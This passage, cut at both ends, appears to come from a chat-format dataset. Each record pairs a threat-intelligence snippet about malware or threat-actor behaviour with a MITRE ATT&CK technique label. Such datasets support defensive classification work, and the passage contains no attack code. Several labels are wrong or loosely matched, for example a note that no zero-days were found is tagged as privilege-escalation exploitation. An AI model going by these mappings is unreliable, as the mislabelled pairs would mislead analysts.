Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Melcoz has been spread through malicious links embedded in e-mails." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may collect information about running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can send email over SMTP." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though QuasarRAT can only be run on Windows systems." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has been distributed through phishing emails containing a malicious URL." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to create to upload files from a compromised host." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin’s thread" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field" }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used to launch an authentication window for users to enter their credentials." }, { "role": "assistant", "content": "T1187 - Forced Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount" }, { "role": "assistant", "content": "T1078.002 - Domain Accounts', 'T1550.001 - Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence is maintained through a Run registry key" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrossRAT is capable of taking screen captures." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can mimic the names of known executables." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT can list file and directory information." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie uses \"ipconfig /all\" and \"route PRINT\" to identify network adapter and interface information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can download files and additional malware components." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can obtain the permissions of the victim user." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly downloaded tools from a remote server after they were inside the victim network." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "kills security tools like Wireshark that are running." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used e-mails with malicious documents to lure victims into installing malware." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit." }, { "role": "assistant", "content": "T1595.002 - Vulnerability Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The datasets included: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrailBlazer has the ability to use WMI for persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can collect the username from the compromised machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads a PowerShell script that decodes to a typical shellcode loader." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The program copies itself as <Hangul full path>HncReporter.exe and changes the default program association in the registry to open HWP documents. To do so, it alters following registry values" }, { "role": "assistant", "content": "T1546.001 - Event Triggered Execution: Change Default File Association" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet has the option to compress its payload using UPX or MPRESS." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user’s AppData\\Local\\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes net start after initial communication is made to the remote server." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the “UPX. string, it has been replaced with “LSD. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "overwrite or delete MBR in same sentence" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete a specified file." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has enumerated hosts, looking to obtain a list of all currently running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HTTPBrowser is capable of writing a file to the compromised system from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PHP malware achieves persistence by adding scheduled tasks on the host to execute daily and at regular intervals. At the same time, a generated TMP file runs a parallel process to launch the stealer component." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs." }, { "role": "assistant", "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Encrypting communications using AES and RSA public key cryptography 5" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain." }, { "role": "assistant", "content": "T1584.001 - Domains', 'T1583.001 - Domains', 'T1587.001 - Malware', 'T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. For more information on infection via service providers see M-Trends 2016). APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In total, nearly 13,000 sets of credentials are included in the data dump" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads files onto infected hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Green Lambert can use `uname` to identify the operating system name, version, and processor type." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT relies on a specific victim hostname to execute and decrypt important strings." }, { "role": "assistant", "content": "T1480.001 - Environmental Keying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Woburn, MA – May 7, 2018 – Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities." }, { "role": "assistant", "content": "T1505.004 - IIS Components" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can collect data from a local system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant – Mukashi." }, { "role": "assistant", "content": "T1588.006 - Vulnerabilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has used VBScript to execute malicious commands and payloads." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "They are known for “living off the land,” meaning they use already available tools and software installed on the computer to operate, and once inside a target network, they will tailor their malware specifically to the target" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 drops a Windows shortcut file for execution." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon identifies files matching certain file extension and copies them to subdirectories it created." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. A copy of the deobfuscated stager can be seen in the image below" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can use `cmd.exe` for execution on remote hosts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15" }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " 